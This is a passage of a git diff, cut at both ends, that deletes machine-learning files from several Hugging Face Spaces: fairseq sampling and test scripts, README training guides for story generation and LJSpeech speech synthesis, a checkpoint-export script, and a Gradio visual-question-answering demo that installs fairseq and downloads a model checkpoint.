'sanmen', - 'TT': 'tiantai', 'WZ': 'wenzhou', 'SC': 'suichang', 'YB': 'youbu'} - -converters = {} - -for dialect in dialects.values(): - try: - converters[dialect] = opencc.OpenCC("chinese_dialect_lexicons/"+dialect) - except: - pass - - -def ngu_dialect_to_ipa(text, dialect): - dialect = dialects[dialect] - text = converters[dialect].convert(text).replace('-','').replace('$',' ') - text = re.sub(r'[、;:]', ',', text) - text = re.sub(r'\s*,\s*', ', ', text) - text = re.sub(r'\s*。\s*', '. ', text) - text = re.sub(r'\s*?\s*', '? ', text) - text = re.sub(r'\s*!\s*', '! ', text) - text = re.sub(r'\s*$', '', text) - return text diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/textless_nlp/gslm/ulm/sample.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/textless_nlp/gslm/ulm/sample.py deleted file mode 100644 index 77302a6894cacf07588cf34fb1e695dc519d7df5..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/textless_nlp/gslm/ulm/sample.py +++ /dev/null @@ -1,174 +0,0 @@ -#!/usr/bin/env python3 -u -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. -""" -Sample from a trained LM; hacked fairseq-interactive -""" -from collections import namedtuple -import os -import ast -import numpy as np - -from fairseq import checkpoint_utils, options, tasks, utils - -import tqdm - -Batch = namedtuple('Batch', 'ids src_tokens src_lengths') -Translation = namedtuple('Translation', 'src_str hypos pos_scores alignments') - - -def make_batches(lines, args, task, max_positions): - tokens = [ - task.source_dictionary.encode_line( - src_str, add_if_not_exist=False - ).long() - for src_str in lines - ] - lengths = [t.numel() for t in tokens] - itr = task.get_batch_iterator( - dataset=task.build_dataset_for_inference(tokens, lengths), - max_tokens=args.dataset.max_tokens, - max_sentences=args.dataset.batch_size, - max_positions=max_positions, - ignore_invalid_inputs=args.dataset.skip_invalid_size_inputs_valid_test - ).next_epoch_itr(shuffle=False) - for batch in itr: - yield Batch( - ids=batch['id'], - src_tokens=batch['net_input']['src_tokens'], src_lengths=batch['net_input']['src_lengths'], - ) - - -def main(args): - arg_prompts = args.prompts - arg_output = args.output - arg_debug = args.debug - arg_sample_size = args.samples_per_prompt - - try: - from fairseq.dataclass.utils import convert_namespace_to_omegaconf - args = convert_namespace_to_omegaconf(args) - except: - pass - - # if args.max_tokens is None and args.max_sentences is None: - if args.common.seed is not None: - np.random.seed(args.common.seed) - utils.set_torch_seed(args.common.seed) - - if args.generation.sampling: - args.generation.nbest = args.generation.beam = arg_sample_size - - task = tasks.setup_task(args.task) - - overrides = ast.literal_eval(args.common_eval.model_overrides) - - models, _model_args = checkpoint_utils.load_model_ensemble( - args.common_eval.path.split(os.pathsep), - arg_overrides=overrides, - task=task, - suffix=getattr(args, "checkpoint_suffix", ""), - ) - - # Set dictionaries - src_dict = task.source_dictionary - tgt_dict = task.target_dictionary - - # Optimize ensemble for generation - for model in models: - model.prepare_for_inference_(args) - model.cuda() - - # Load alignment dictionary for unknown word replacement - # (None if no unknown word replacement, empty if no path to align dictionary) - align_dict = utils.load_align_dict(args.generation.replace_unk) - - max_positions = utils.resolve_max_positions( - task.max_positions(), - *[model.max_positions() for model in models] - ) - - output_file = open(arg_output, 'w') - - with open(arg_prompts, 'r') as fin: - lines = fin.readlines() - - split = [x.split('|', 1) for x in lines] - seq_id = [x[0] for x in split] - prompts = [x[1] for x in split] - - if args.generation.prefix_size >= 0: - prompts = [' '.join(l.split()[:args.generation.prefix_size]) - for l in prompts] - - if arg_debug: - prompts = prompts[:10] - - generator = task.build_generator(models, args.generation) - - start_id = 0 - pbar = tqdm.tqdm(total=len(prompts)) - for batch in make_batches(prompts, args, task, max_positions): - src_tokens = batch.src_tokens - src_lengths = batch.src_lengths - src_tokens = src_tokens.cuda() - src_lengths = src_lengths.cuda() - - sample = { - 'net_input': { - 'src_tokens': src_tokens, - 'src_lengths': src_lengths, - }, - } - - results = [] - translations = task.inference_step(generator, models, sample) - for i, (id, hypos) in enumerate(zip(batch.ids.tolist(), translations)): - src_tokens_i = utils.strip_pad(src_tokens[i], tgt_dict.pad()) - results.append((i + start_id, src_tokens_i, hypos)) - - # sort output to match input order - for id, src_tokens, hypos in sorted(results, key=lambda x: x[0]): - if src_dict is not None: - src_str = src_dict.string( - src_tokens, args.common_eval.post_process) - - # Process top predictions - for hypo_id, hypo in enumerate(hypos): - _hypo_tokens, hypo_str, _alignment = utils.post_process_prediction( - hypo_tokens=hypo['tokens'].int().cpu(), - src_str=src_str, - alignment=hypo['alignment'], - align_dict=align_dict, - tgt_dict=tgt_dict, - remove_bpe=args.common_eval.post_process, - ) - - detok_hypo_str = hypo_str - utterance = detok_hypo_str - print(f'{seq_id[id]}__{hypo_id}|{utterance}', file=output_file) - pbar.update(1) - start_id += len(results) - - # output_file.close() - - -def cli_main(): - parser = options.get_interactive_generation_parser() - parser.add_argument('--prompts', type=str, default=None, required=True) - parser.add_argument('--output', type=str, default=None, required=True) - parser.add_argument('--debug', action='store_true') - parser.add_argument('--samples-per-prompt', type=int, default=1) - - args = options.parse_args_and_arch(parser) - - np.random.seed(args.seed) - utils.set_torch_seed(args.seed) - - main(args) - - -if __name__ == '__main__': - cli_main() diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/test_label_smoothing.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/test_label_smoothing.py deleted file mode 100644 index 04c0f974ac80f7606327f868e948712c3c18f1d0..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/test_label_smoothing.py +++ /dev/null @@ -1,123 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import argparse -import copy -import unittest - -import tests.utils as test_utils -import torch -from fairseq.criterions.cross_entropy import CrossEntropyCriterion -from fairseq.criterions.label_smoothed_cross_entropy import ( - LabelSmoothedCrossEntropyCriterion, -) - - -class TestLabelSmoothing(unittest.TestCase): - def setUp(self): - # build dictionary - self.d = test_utils.dummy_dictionary(3) - vocab = len(self.d) - self.assertEqual(vocab, 4 + 3) # 4 special + 3 tokens - self.assertEqual(self.d.pad(), 1) - self.assertEqual(self.d.eos(), 2) - self.assertEqual(self.d.unk(), 3) - pad, eos, unk, w1, w2, w3 = 1, 2, 3, 4, 5, 6 # noqa: F841 - - # build dataset - self.data = [ - # the first batch item has padding - { - "source": torch.LongTensor([w1, eos]), - "target": torch.LongTensor([w1, eos]), - }, - { - "source": torch.LongTensor([w1, eos]), - "target": torch.LongTensor([w1, w1, eos]), - }, - ] - self.sample = next(test_utils.dummy_dataloader(self.data)) - - # build model - self.args = argparse.Namespace() - self.args.sentence_avg = False - self.args.report_accuracy = False - self.args.probs = ( - torch.FloatTensor( - [ - # pad eos unk w1 w2 w3 - [0.05, 0.05, 0.1, 0.05, 0.3, 0.4, 0.05], - [0.05, 0.10, 0.2, 0.05, 0.2, 0.3, 0.10], - [0.05, 0.15, 0.3, 0.05, 0.1, 0.2, 0.15], - ] - ) - .unsqueeze(0) - .expand(2, 3, 7) - ) # add batch dimension - self.task = test_utils.TestTranslationTask.setup_task(self.args, self.d, self.d) - self.model = self.task.build_model(self.args) - - def test_nll_loss(self): - self.args.label_smoothing = 0.1 - nll_crit = CrossEntropyCriterion.build_criterion(self.args, self.task) - smooth_crit = LabelSmoothedCrossEntropyCriterion.build_criterion( - self.args, self.task - ) - nll_loss, nll_sample_size, nll_logging_output = nll_crit( - self.model, self.sample - ) - smooth_loss, smooth_sample_size, smooth_logging_output = smooth_crit( - self.model, self.sample - ) - self.assertLess(abs(nll_loss - nll_logging_output["loss"]), 1e-6) - self.assertLess(abs(nll_loss - smooth_logging_output["nll_loss"]), 1e-6) - - def test_padding(self): - self.args.label_smoothing = 0.1 - crit = LabelSmoothedCrossEntropyCriterion.build_criterion(self.args, self.task) - loss, _, logging_output = crit(self.model, self.sample) - - def get_one_no_padding(idx): - # create a new sample with just a single batch item so that there's - # no padding - sample1 = next(test_utils.dummy_dataloader([self.data[idx]])) - args1 = copy.copy(self.args) - args1.probs = args1.probs[idx, :, :].unsqueeze(0) - model1 = self.task.build_model(args1) - loss1, _, _ = crit(model1, sample1) - return loss1 - - loss1 = get_one_no_padding(0) - loss2 = get_one_no_padding(1) - self.assertAlmostEqual(loss, loss1 + loss2) - - def test_reduction(self): - self.args.label_smoothing = 0.1 - crit = LabelSmoothedCrossEntropyCriterion.build_criterion(self.args, self.task) - loss, _, logging_output = crit(self.model, self.sample, reduce=True) - unreduced_loss, _, _ = crit(self.model, self.sample, reduce=False) - self.assertAlmostEqual(loss, unreduced_loss.sum()) - - def test_zero_eps(self): - self.args.label_smoothing = 0.0 - nll_crit = CrossEntropyCriterion.build_criterion(self.args, self.task) - smooth_crit = LabelSmoothedCrossEntropyCriterion.build_criterion( - self.args, self.task - ) - nll_loss, nll_sample_size, nll_logging_output = nll_crit( - self.model, self.sample - ) - smooth_loss, smooth_sample_size, smooth_logging_output = smooth_crit( - self.model, self.sample - ) - self.assertAlmostEqual(nll_loss, smooth_loss) - - def assertAlmostEqual(self, t1, t2): - self.assertEqual(t1.size(), t2.size(), "size mismatch") - self.assertLess((t1 - t2).abs().max(), 1e-6) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/stories/README.md b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/stories/README.md deleted file mode 100644 index 588941eddc5f0280f5254affd40ef49de874c885..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/stories/README.md +++ /dev/null @@ -1,66 +0,0 @@ -# Hierarchical Neural Story Generation (Fan et al., 2018) - -The following commands provide an example of pre-processing data, training a model, and generating text for story generation with the WritingPrompts dataset. - -## Pre-trained models - -Description | Dataset | Model | Test set(s) ----|---|---|--- -Stories with Convolutional Model
    ([Fan et al., 2018](https://arxiv.org/abs/1805.04833)) | [WritingPrompts](https://dl.fbaipublicfiles.com/fairseq/data/writingPrompts.tar.gz) | [download (.tar.bz2)](https://dl.fbaipublicfiles.com/fairseq/models/stories_checkpoint.tar.bz2) | [download (.tar.bz2)](https://dl.fbaipublicfiles.com/fairseq/data/stories_test.tar.bz2) - -We provide sample stories generated by the [convolutional seq2seq model](https://dl.fbaipublicfiles.com/fairseq/data/seq2seq_stories.txt) and [fusion model](https://dl.fbaipublicfiles.com/fairseq/data/fusion_stories.txt) from [Fan et al., 2018](https://arxiv.org/abs/1805.04833). The corresponding prompts for the fusion model can be found [here](https://dl.fbaipublicfiles.com/fairseq/data/fusion_prompts.txt). Note that there are unk in the file, as we modeled a small full vocabulary (no BPE or pre-training). We did not use these unk prompts for human evaluation. - -## Dataset - -The dataset can be downloaded like this: - -```bash -cd examples/stories -curl https://dl.fbaipublicfiles.com/fairseq/data/writingPrompts.tar.gz | tar xvzf - -``` - -and contains a train, test, and valid split. The dataset is described here: https://arxiv.org/abs/1805.04833. We model only the first 1000 words of each story, including one newLine token. - -## Example usage - -First we will preprocess the dataset. Note that the dataset release is the full data, but the paper models the first 1000 words of each story. Here is example code that trims the dataset to the first 1000 words of each story: -```python -data = ["train", "test", "valid"] -for name in data: - with open(name + ".wp_target") as f: - stories = f.readlines() - stories = [" ".join(i.split()[0:1000]) for i in stories] - with open(name + ".wp_target", "w") as o: - for line in stories: - o.write(line.strip() + "\n") -``` - -Once we've trimmed the data we can binarize it and train our model: -```bash -# Binarize the dataset: -export TEXT=examples/stories/writingPrompts -fairseq-preprocess --source-lang wp_source --target-lang wp_target \ - --trainpref $TEXT/train --validpref $TEXT/valid --testpref $TEXT/test \ - --destdir data-bin/writingPrompts --padding-factor 1 --thresholdtgt 10 --thresholdsrc 10 - -# Train the model: -fairseq-train data-bin/writingPrompts -a fconv_self_att_wp --lr 0.25 --optimizer nag --clip-norm 0.1 --max-tokens 1500 --lr-scheduler reduce_lr_on_plateau --decoder-attention True --encoder-attention False --criterion label_smoothed_cross_entropy --weight-decay .0000001 --label-smoothing 0 --source-lang wp_source --target-lang wp_target --gated-attention True --self-attention True --project-input True --pretrained False - -# Train a fusion model: -# add the arguments: --pretrained True --pretrained-checkpoint path/to/checkpoint - -# Generate: -# Note: to load the pretrained model at generation time, you need to pass in a model-override argument to communicate to the fusion model at generation time where you have placed the pretrained checkpoint. By default, it will load the exact path of the fusion model's pretrained model from training time. You should use model-override if you have moved the pretrained model (or are using our provided models). If you are generating from a non-fusion model, the model-override argument is not necessary. - -fairseq-generate data-bin/writingPrompts --path /path/to/trained/model/checkpoint_best.pt --batch-size 32 --beam 1 --sampling --sampling-topk 10 --temperature 0.8 --nbest 1 --model-overrides "{'pretrained_checkpoint':'/path/to/pretrained/model/checkpoint'}" -``` - -## Citation -```bibtex -@inproceedings{fan2018hierarchical, - title = {Hierarchical Neural Story Generation}, - author = {Fan, Angela and Lewis, Mike and Dauphin, Yann}, - booktitle = {Conference of the Association for Computational Linguistics (ACL)}, - year = 2018, -} -``` diff --git a/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/latent_depth/latent_depth_src/models/latent_multilingual_transformer.py b/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/latent_depth/latent_depth_src/models/latent_multilingual_transformer.py deleted file mode 100644 index 9e7b655feee0042d42ac2b13cec5f1d2a88e201e..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Visual_Grounding/fairseq/examples/latent_depth/latent_depth_src/models/latent_multilingual_transformer.py +++ /dev/null @@ -1,76 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from fairseq.models import register_model, register_model_architecture -from fairseq.models.multilingual_transformer import MultilingualTransformerModel -from fairseq.models.transformer import ( - TransformerDecoder, - TransformerEncoder, - base_architecture, -) -from fairseq.utils import safe_hasattr - -from .latent_transformer import LatentTransformerDecoder, LatentTransformerEncoder - - -@register_model("latent_multilingual_transformer") -class LatentMultilingualTransformerModel(MultilingualTransformerModel): - """A variant of standard multilingual Transformer models which encoder and/or - decoders supports latent depth, as is in "Deep Transformer with Latent Depth" - (https://arxiv.org/abs/2009.13102). - """ - - @staticmethod - def add_args(parser): - """Add model-specific arguments to the parser.""" - MultilingualTransformerModel.add_args(parser) - parser.add_argument( - '--soft-select', - action='store_true', - help='use soft samples in training an inference', - ) - parser.add_argument( - '--sampling-tau', - type=float, - default=5., - help='sampling temperature', - ) - - @classmethod - def _get_module_class(cls, is_encoder, args, lang_dict, embed_tokens, langs): - if is_encoder: - if safe_hasattr(args, "encoder_latent_layer") and args.encoder_latent_layer: - return LatentTransformerEncoder( - args, lang_dict, embed_tokens, num_logits=len(langs) - ) - else: - return TransformerEncoder(args, lang_dict, embed_tokens) - else: - if safe_hasattr(args, "decoder_latent_layer") and args.decoder_latent_layer: - return LatentTransformerDecoder( - args, lang_dict, embed_tokens, num_logits=len(langs) - ) - else: - return TransformerDecoder(args, lang_dict, embed_tokens) - - -@register_model_architecture( - "latent_multilingual_transformer", "latent_multilingual_transformer" -) -def latent_multilingual_architecture(args): - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 512) - args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 1024) - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 4) - args.encoder_layers = getattr(args, "encoder_layers", 12) - args.decoder_embed_dim = getattr(args, "decoder_embed_dim", 512) - args.decoder_ffn_embed_dim = getattr(args, "decoder_ffn_embed_dim", 1024) - args.decoder_attention_heads = getattr(args, "decoder_attention_heads", 4) - args.decoder_layers = getattr(args, "decoder_layers", 24) - args.share_encoders = getattr(args, "share_encoders", True) - args.share_decoders = getattr(args, "share_decoders", True) - args.share_encoder_embeddings = getattr(args, "share_encoder_embeddings", True) - args.share_decoder_embeddings = getattr(args, "share_decoder_embeddings", True) - - base_architecture(args) diff --git a/spaces/OFA-Sys/OFA-vqa/app.py b/spaces/OFA-Sys/OFA-vqa/app.py deleted file mode 100644 index 89695235049069a40f276540ca74beaae0b7bfdc..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/app.py +++ /dev/null @@ -1,153 +0,0 @@ -import os - -os.system('cd fairseq;' - 'pip install ./; cd ..') -os.system('ls -l') - -import torch -import numpy as np -import re -from fairseq import utils,tasks -from fairseq import checkpoint_utils -from fairseq import distributed_utils, options, tasks, utils -from fairseq.dataclass.utils import convert_namespace_to_omegaconf -from utils.zero_shot_utils import zero_shot_step -from tasks.mm_tasks.vqa_gen import VqaGenTask -from models.ofa import OFAModel -from PIL import Image -from torchvision import transforms -import gradio as gr - -# Register VQA task -tasks.register_task('vqa_gen',VqaGenTask) -# turn on cuda if GPU is available -use_cuda = torch.cuda.is_available() -# use fp16 only when GPU is available -use_fp16 = False - -os.system('wget https://ofa-silicon.oss-us-west-1.aliyuncs.com/checkpoints/ofa_large_384.pt; ' - 'mkdir -p checkpoints; mv ofa_large_384.pt checkpoints/ofa_large_384.pt') - -# specify some options for evaluation -parser = options.get_generation_parser() -input_args = ["", "--task=vqa_gen", "--beam=100", "--unnormalized", "--path=checkpoints/ofa_large_384.pt", "--bpe-dir=utils/BPE"] -args = options.parse_args_and_arch(parser, input_args) -cfg = convert_namespace_to_omegaconf(args) - -# Load pretrained ckpt & config -task = tasks.setup_task(cfg.task) -models, cfg = checkpoint_utils.load_model_ensemble( - utils.split_paths(cfg.common_eval.path), - task=task -) - -# Move models to GPU -for model in models: - model.eval() - if use_fp16: - model.half() - if use_cuda and not cfg.distributed_training.pipeline_model_parallel: - model.cuda() - model.prepare_for_inference_(cfg) - -# Initialize generator -generator = task.build_generator(models, cfg.generation) - -# Image transform -from torchvision import transforms -mean = [0.5, 0.5, 0.5] -std = [0.5, 0.5, 0.5] - -patch_resize_transform = transforms.Compose([ - lambda image: image.convert("RGB"), - transforms.Resize((cfg.task.patch_image_size, cfg.task.patch_image_size), interpolation=Image.BICUBIC), - transforms.ToTensor(), - transforms.Normalize(mean=mean, std=std), -]) - -# Text preprocess -bos_item = torch.LongTensor([task.src_dict.bos()]) -eos_item = torch.LongTensor([task.src_dict.eos()]) -pad_idx = task.src_dict.pad() - -# Normalize the question -def pre_question(question, max_ques_words): - question = question.lower().lstrip(",.!?*#:;~").replace('-', ' ').replace('/', ' ') - question = re.sub( - r"\s{2,}", - ' ', - question, - ) - question = question.rstrip('\n') - question = question.strip(' ') - # truncate question - question_words = question.split(' ') - if len(question_words) > max_ques_words: - question = ' '.join(question_words[:max_ques_words]) - return question - -def encode_text(text, length=None, append_bos=False, append_eos=False): - s = task.tgt_dict.encode_line( - line=task.bpe.encode(text), - add_if_not_exist=False, - append_eos=False - ).long() - if length is not None: - s = s[:length] - if append_bos: - s = torch.cat([bos_item, s]) - if append_eos: - s = torch.cat([s, eos_item]) - return s - -# Construct input for open-domain VQA task -def construct_sample(image: Image, question: str): - patch_image = patch_resize_transform(image).unsqueeze(0) - patch_mask = torch.tensor([True]) - - question = pre_question(question, task.cfg.max_src_length) - question = question + '?' if not question.endswith('?') else question - src_text = encode_text(' {}'.format(question), append_bos=True, append_eos=True).unsqueeze(0) - - src_length = torch.LongTensor([s.ne(pad_idx).long().sum() for s in src_text]) - ref_dict = np.array([{'yes': 1.0}]) # just placeholder - sample = { - "id":np.array(['42']), - "net_input": { - "src_tokens": src_text, - "src_lengths": src_length, - "patch_images": patch_image, - "patch_masks": patch_mask, - }, - "ref_dict": ref_dict, - } - return sample - -# Function to turn FP32 to FP16 -def apply_half(t): - if t.dtype is torch.float32: - return t.to(dtype=torch.half) - return t - - -# Function for image captioning -def open_domain_vqa(Image, Question): - sample = construct_sample(Image, Question) - sample = utils.move_to_cuda(sample) if use_cuda else sample - sample = utils.apply_to_sample(apply_half, sample) if use_fp16 else sample - # Run eval step for open-domain VQA - with torch.no_grad(): - result, scores = zero_shot_step(task, generator, models, sample) - return result[0]['answer'] - - -title = "OFA-Visual_Question_Answering" -description = "Gradio Demo for OFA-Visual_Question_Answering. Upload your own image (high-resolution images are recommended) or click any one of the examples, and click " \ - "\"Submit\" and then wait for OFA's answer. " -article = "

    OFA Github " \ - "Repo

    " -examples = [['cat-4894153_1920.jpg', 'where are the cats?'], ['men-6245003_1920.jpg', 'how many people are in the image?'], ['labrador-retriever-7004193_1920.jpg', 'what breed is the dog in the picture?'], ['Starry_Night.jpeg', 'what style does the picture belong to?']] -io = gr.Interface(fn=open_domain_vqa, inputs=[gr.inputs.Image(type='pil'), "textbox"], outputs=gr.outputs.Textbox(label="Answer"), - title=title, description=description, article=article, examples=examples, - allow_flagging=False, allow_screenshot=False) -io.launch() \ No newline at end of file diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_synthesis/docs/ljspeech_example.md b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_synthesis/docs/ljspeech_example.md deleted file mode 100644 index 90c524fac8ffdc1819ec9bb36928500320337603..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_synthesis/docs/ljspeech_example.md +++ /dev/null @@ -1,138 +0,0 @@ -[[Back]](..) - -# LJSpeech - -[LJSpeech](https://keithito.com/LJ-Speech-Dataset) is a public domain TTS -corpus with around 24 hours of English speech sampled at 22.05kHz. We provide examples for building -[Transformer](https://arxiv.org/abs/1809.08895) and [FastSpeech 2](https://arxiv.org/abs/2006.04558) -models on this dataset. - - -## Data preparation - -Download data, create splits and generate audio manifests with -```bash -python -m examples.speech_synthesis.preprocessing.get_ljspeech_audio_manifest \ - --output-data-root ${AUDIO_DATA_ROOT} \ - --output-manifest-root ${AUDIO_MANIFEST_ROOT} -``` - -Then, extract log-Mel spectrograms, generate feature manifest and create data configuration YAML with -```bash -python -m examples.speech_synthesis.preprocessing.get_feature_manifest \ - --audio-manifest-root ${AUDIO_MANIFEST_ROOT} \ - --output-root ${FEATURE_MANIFEST_ROOT} \ - --ipa-vocab --use-g2p -``` -where we use phoneme inputs (`--ipa-vocab --use-g2p`) as example. - -FastSpeech 2 additionally requires frame durations, pitch and energy as auxiliary training targets. -Add `--add-fastspeech-targets` to include these fields in the feature manifests. We get frame durations either from -phoneme-level force-alignment or frame-level pseudo-text unit sequence. They should be pre-computed and specified via: -- `--textgrid-zip ${TEXT_GRID_ZIP_PATH}` for a ZIP file, inside which there is one - [TextGrid](https://www.fon.hum.uva.nl/praat/manual/TextGrid.html) file per sample to provide force-alignment info. -- `--id-to-units-tsv ${ID_TO_UNIT_TSV}` for a TSV file, where there are 2 columns for sample ID and - space-delimited pseudo-text unit sequence, respectively. - -For your convenience, we provide pre-computed -[force-alignment](https://dl.fbaipublicfiles.com/fairseq/s2/ljspeech_mfa.zip) from -[Montreal Forced Aligner](https://github.com/MontrealCorpusTools/Montreal-Forced-Aligner) and -[pseudo-text units](s3://dl.fbaipublicfiles.com/fairseq/s2/ljspeech_hubert.tsv) from -[HuBERT](https://github.com/pytorch/fairseq/tree/main/examples/hubert). You can also generate them by yourself using -a different software or model. - - -## Training -#### Transformer -```bash -fairseq-train ${FEATURE_MANIFEST_ROOT} --save-dir ${SAVE_DIR} \ - --config-yaml config.yaml --train-subset train --valid-subset dev \ - --num-workers 4 --max-tokens 30000 --max-update 200000 \ - --task text_to_speech --criterion tacotron2 --arch tts_transformer \ - --clip-norm 5.0 --n-frames-per-step 4 --bce-pos-weight 5.0 \ - --dropout 0.1 --attention-dropout 0.1 --activation-dropout 0.1 \ - --encoder-normalize-before --decoder-normalize-before \ - --optimizer adam --lr 2e-3 --lr-scheduler inverse_sqrt --warmup-updates 4000 \ - --seed 1 --update-freq 8 --eval-inference --best-checkpoint-metric mcd_loss -``` -where `SAVE_DIR` is the checkpoint root path. We set `--update-freq 8` to simulate 8 GPUs with 1 GPU. You may want to -update it accordingly when using more than 1 GPU. - -#### FastSpeech2 -```bash -fairseq-train ${FEATURE_MANIFEST_ROOT} --save-dir ${SAVE_DIR} \ - --config-yaml config.yaml --train-subset train --valid-subset dev \ - --num-workers 4 --max-sentences 6 --max-update 200000 \ - --task text_to_speech --criterion fastspeech2 --arch fastspeech2 \ - --clip-norm 5.0 --n-frames-per-step 1 \ - --dropout 0.1 --attention-dropout 0.1 --activation-dropout 0.1 \ - --encoder-normalize-before --decoder-normalize-before \ - --optimizer adam --lr 5e-4 --lr-scheduler inverse_sqrt --warmup-updates 4000 \ - --seed 1 --update-freq 8 --eval-inference --best-checkpoint-metric mcd_loss -``` - - -## Inference -Average the last 5 checkpoints, generate the test split spectrogram and waveform using the default Griffin-Lim vocoder: -```bash -SPLIT=test -CHECKPOINT_NAME=avg_last_5 -CHECKPOINT_PATH=${SAVE_DIR}/checkpoint_${CHECKPOINT_NAME}.pt -python scripts/average_checkpoints.py --inputs ${SAVE_DIR} \ - --num-epoch-checkpoints 5 \ - --output ${CHECKPOINT_PATH} - -python -m examples.speech_synthesis.generate_waveform ${FEATURE_MANIFEST_ROOT} \ - --config-yaml config.yaml --gen-subset ${SPLIT} --task text_to_speech \ - --path ${CHECKPOINT_PATH} --max-tokens 50000 --spec-bwd-max-iter 32 \ - --dump-waveforms -``` -which dumps files (waveform, feature, attention plot, etc.) to `${SAVE_DIR}/generate-${CHECKPOINT_NAME}-${SPLIT}`. To -re-synthesize target waveforms for automatic evaluation, add `--dump-target`. - -## Automatic Evaluation -To start with, generate the manifest for synthetic speech, which will be taken as inputs by evaluation scripts. -```bash -python -m examples.speech_synthesis.evaluation.get_eval_manifest \ - --generation-root ${SAVE_DIR}/generate-${CHECKPOINT_NAME}-${SPLIT} \ - --audio-manifest ${AUDIO_MANIFEST_ROOT}/${SPLIT}.audio.tsv \ - --output-path ${EVAL_OUTPUT_ROOT}/eval.tsv \ - --vocoder griffin_lim --sample-rate 22050 --audio-format flac \ - --use-resynthesized-target -``` -Speech recognition (ASR) models usually operate at lower sample rates (e.g. 16kHz). For the WER/CER metric, -you may need to resample the audios accordingly --- add `--output-sample-rate 16000` for `generate_waveform.py` and -use `--sample-rate 16000` for `get_eval_manifest.py`. - - -#### WER/CER metric -We use wav2vec 2.0 ASR model as example. [Download](https://github.com/pytorch/fairseq/tree/main/examples/wav2vec) -the model checkpoint and dictionary, then compute WER/CER with -```bash -python -m examples.speech_synthesis.evaluation.eval_asr \ - --audio-header syn --text-header text --err-unit char --split ${SPLIT} \ - --w2v-ckpt ${WAV2VEC2_CHECKPOINT_PATH} --w2v-dict-dir ${WAV2VEC2_DICT_DIR} \ - --raw-manifest ${EVAL_OUTPUT_ROOT}/eval_16khz.tsv --asr-dir ${EVAL_OUTPUT_ROOT}/asr -``` - -#### MCD/MSD metric -```bash -python -m examples.speech_synthesis.evaluation.eval_sp \ - ${EVAL_OUTPUT_ROOT}/eval.tsv --mcd --msd -``` - -#### F0 metrics -```bash -python -m examples.speech_synthesis.evaluation.eval_f0 \ - ${EVAL_OUTPUT_ROOT}/eval.tsv --gpe --vde --ffe -``` - - -## Results - -| --arch | Params | Test MCD | Model | -|---|---|---|---| -| tts_transformer | 54M | 3.8 | [Download](https://dl.fbaipublicfiles.com/fairseq/s2/ljspeech_transformer_phn.tar) | -| fastspeech2 | 41M | 3.8 | [Download](https://dl.fbaipublicfiles.com/fairseq/s2/ljspeech_fastspeech2_phn.tar) | - -[[Back]](..) diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/model_parallel/__init__.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/model_parallel/__init__.py deleted file mode 100644 index 69f21684872f72ae8ee26d9ff7d2d2b6e6d526c3..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/model_parallel/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from . import criterions, models, modules # noqa diff --git a/spaces/ORI-Muchim/MarinTTS/export_model.py b/spaces/ORI-Muchim/MarinTTS/export_model.py deleted file mode 100644 index 98a49835df5a7a2486e76ddf94fbbb4444b52203..0000000000000000000000000000000000000000 --- a/spaces/ORI-Muchim/MarinTTS/export_model.py +++ /dev/null @@ -1,13 +0,0 @@ -import torch - -if __name__ == '__main__': - model_path = "saved_model/11/model.pth" - output_path = "saved_model/11/model1.pth" - checkpoint_dict = torch.load(model_path, map_location='cpu') - checkpoint_dict_new = {} - for k, v in checkpoint_dict.items(): - if k == "optimizer": - print("remove optimizer") - continue - checkpoint_dict_new[k] = v - torch.save(checkpoint_dict_new, output_path) diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/detectron2/modeling/box_regression.py b/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/detectron2/modeling/box_regression.py deleted file mode 100644 index b24c123f26faa5f17975fe13b6756151da229b2f..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/detectron2/modeling/box_regression.py +++ /dev/null @@ -1,369 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import math -from typing import List, Tuple, Union -import torch -from fvcore.nn import giou_loss, smooth_l1_loss -from torch.nn import functional as F - -from detectron2.layers import cat, ciou_loss, diou_loss -from detectron2.structures import Boxes - -# Value for clamping large dw and dh predictions. The heuristic is that we clamp -# such that dw and dh are no larger than what would transform a 16px box into a -# 1000px box (based on a small anchor, 16px, and a typical image size, 1000px). -_DEFAULT_SCALE_CLAMP = 